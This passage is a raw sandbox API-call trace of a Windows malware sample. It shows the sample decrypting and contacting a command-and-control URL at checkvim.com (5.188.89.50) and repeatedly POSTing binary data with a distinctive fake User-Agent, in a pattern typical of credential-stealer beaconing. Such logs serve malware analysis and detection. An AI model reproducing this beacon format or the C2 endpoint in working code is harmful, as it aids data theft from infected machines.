HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0245.311] GetProcessHeap () returned 0x840000 [0245.311] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0245.311] GetProcessHeap () returned 0x840000 [0245.311] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0245.311] send (s=0x358, buf=0x873a58*, len=237, flags=0) returned 237 [0245.311] send (s=0x358, buf=0x87eb58*, len=159, flags=0) returned 159 [0245.311] GetProcessHeap () returned 0x840000 [0245.311] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0245.311] recv (in: s=0x358, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0245.681] GetProcessHeap () returned 0x840000 [0245.681] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0245.681] GetProcessHeap () returned 0x840000 [0245.681] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0245.681] GetProcessHeap () returned 0x840000 [0245.681] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0245.681] GetProcessHeap () returned 0x840000 [0245.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0245.682] closesocket (s=0x358) returned 0 [0245.682] GetProcessHeap () returned 0x840000 [0245.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bc8 | out: hHeap=0x840000) returned 1 [0245.682] GetProcessHeap () returned 0x840000 [0245.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0245.682] GetProcessHeap () returned 0x840000 [0245.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0245.682] GetProcessHeap () returned 0x840000 [0245.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0245.683] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x704) returned 0x358 [0245.684] Sleep (dwMilliseconds=0xea60) [0245.686] GetProcessHeap () returned 0x840000 [0245.686] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f830 [0245.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.698] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0245.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.705] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f2d0) returned 1 [0245.711] GetProcessHeap () returned 0x840000 [0245.711] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0245.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.712] CryptImportKey (in: hProv=0x86f2d0, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0245.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.713] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0245.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.714] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.714] GetProcessHeap () returned 0x840000 [0245.714] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0245.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.715] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f830, pdwDataLen=0x19f9a4 | out: pbData=0x87f830, pdwDataLen=0x19f9a4) returned 1 [0245.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.716] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0245.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.717] CryptReleaseContext (hProv=0x86f2d0, dwFlags=0x0) returned 1 [0245.717] GetProcessHeap () returned 0x840000 [0245.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0245.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.718] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0245.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.718] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0245.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.719] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0245.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.720] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0245.720] GetProcessHeap () returned 0x840000 [0245.720] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0245.720] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0245.720] GetProcessHeap () returned 0x840000 [0245.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0245.720] GetProcessHeap () returned 0x840000 [0245.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0245.721] GetProcessHeap () returned 0x840000 [0245.721] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0245.721] GetProcessHeap () returned 0x840000 [0245.721] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fab8 [0245.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.721] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0245.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.726] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0245.732] GetProcessHeap () returned 0x840000 [0245.732] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0245.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.732] CryptImportKey (in: hProv=0x86fa40, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9f0) returned 1 [0245.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.733] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0245.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.735] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.735] GetProcessHeap () returned 0x840000 [0245.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0245.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.736] CryptDecrypt (in: hKey=0x87e9f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fab8, pdwDataLen=0x19f9a4 | out: pbData=0x87fab8, pdwDataLen=0x19f9a4) returned 1 [0245.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.737] CryptDestroyKey (hKey=0x87e9f0) returned 1 [0245.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0245.738] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0245.738] GetProcessHeap () returned 0x840000 [0245.738] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0245.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.739] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0245.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.740] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0245.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.741] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0245.741] GetProcessHeap () returned 0x840000 [0245.741] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0245.741] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0245.742] GetProcessHeap () returned 0x840000 [0245.742] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0245.742] socket (af=2, type=1, protocol=6) returned 0x35c [0245.742] connect (s=0x35c, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0245.820] FreeAddrInfoW (pAddrInfo=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0245.820] GetProcessHeap () returned 0x840000 [0245.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0245.820] GetProcessHeap () returned 0x840000 [0245.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0245.821] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0245.822] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0245.822] GetProcessHeap () returned 0x840000 [0245.822] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0245.822] GetProcessHeap () returned 0x840000 [0245.822] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0245.822] GetProcessHeap () returned 0x840000 [0245.822] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f998 [0245.822] GetProcessHeap () returned 0x840000 [0245.822] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0245.822] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0245.823] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0245.823] GetProcessHeap () returned 0x840000 [0245.823] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0245.823] GetProcessHeap () returned 0x840000 [0245.823] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0245.823] send (s=0x35c, buf=0x873a58*, len=237, flags=0) returned 237 [0245.824] send (s=0x35c, buf=0x87eb58*, len=159, flags=0) returned 159 [0245.824] GetProcessHeap () returned 0x840000 [0245.824] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0245.824] recv (in: s=0x35c, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0246.183] GetProcessHeap () returned 0x840000 [0246.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0246.183] GetProcessHeap () returned 0x840000 [0246.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0246.183] GetProcessHeap () returned 0x840000 [0246.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0246.183] GetProcessHeap () returned 0x840000 [0246.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0246.183] closesocket (s=0x35c) returned 0 [0246.183] GetProcessHeap () returned 0x840000 [0246.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0246.183] GetProcessHeap () returned 0x840000 [0246.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0246.184] GetProcessHeap () returned 0x840000 [0246.184] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0246.184] GetProcessHeap () returned 0x840000 [0246.184] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0246.187] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xbe8) returned 0x35c [0246.189] Sleep (dwMilliseconds=0xea60) [0246.191] GetProcessHeap () returned 0x840000 [0246.191] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0246.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.192] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0246.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.200] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0246.207] GetProcessHeap () returned 0x840000 [0246.208] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0246.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.209] CryptImportKey (in: hProv=0x86ff90, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0246.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.210] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0246.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.210] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.210] GetProcessHeap () returned 0x840000 [0246.210] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0246.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.211] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0246.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.212] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0246.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.213] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0246.213] GetProcessHeap () returned 0x840000 [0246.213] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0246.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.214] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.215] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.216] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.219] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.219] GetProcessHeap () returned 0x840000 [0246.219] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0246.219] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0246.219] GetProcessHeap () returned 0x840000 [0246.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0246.219] GetProcessHeap () returned 0x840000 [0246.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0246.219] GetProcessHeap () returned 0x840000 [0246.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0246.219] GetProcessHeap () returned 0x840000 [0246.219] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0246.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.220] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0246.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.226] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0246.297] GetProcessHeap () returned 0x840000 [0246.297] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0246.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.299] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0246.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.300] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0246.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.301] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.301] GetProcessHeap () returned 0x840000 [0246.301] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0246.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.303] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0246.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.304] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0246.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0246.305] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0246.305] GetProcessHeap () returned 0x840000 [0246.305] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0246.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.306] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0246.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.307] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0246.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.308] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0246.308] GetProcessHeap () returned 0x840000 [0246.308] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0246.308] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0246.310] GetProcessHeap () returned 0x840000 [0246.310] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b98 [0246.310] socket (af=2, type=1, protocol=6) returned 0x360 [0246.310] connect (s=0x360, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0246.386] FreeAddrInfoW (pAddrInfo=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0246.386] GetProcessHeap () returned 0x840000 [0246.386] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0246.386] GetProcessHeap () returned 0x840000 [0246.386] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0246.387] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0246.388] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0246.388] GetProcessHeap () returned 0x840000 [0246.388] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0246.388] GetProcessHeap () returned 0x840000 [0246.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0246.389] GetProcessHeap () returned 0x840000 [0246.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0246.389] GetProcessHeap () returned 0x840000 [0246.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0246.390] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0246.390] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0246.392] GetProcessHeap () returned 0x840000 [0246.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0246.392] GetProcessHeap () returned 0x840000 [0246.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0246.393] send (s=0x360, buf=0x873a58*, len=237, flags=0) returned 237 [0246.393] send (s=0x360, buf=0x87eb58*, len=159, flags=0) returned 159 [0246.393] GetProcessHeap () returned 0x840000 [0246.393] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0246.393] recv (in: s=0x360, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0246.785] GetProcessHeap () returned 0x840000 [0246.786] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0246.786] GetProcessHeap () returned 0x840000 [0246.786] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0246.786] GetProcessHeap () returned 0x840000 [0246.786] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0246.786] GetProcessHeap () returned 0x840000 [0246.786] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0246.786] closesocket (s=0x360) returned 0 [0246.821] GetProcessHeap () returned 0x840000 [0246.821] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b98 | out: hHeap=0x840000) returned 1 [0246.821] GetProcessHeap () returned 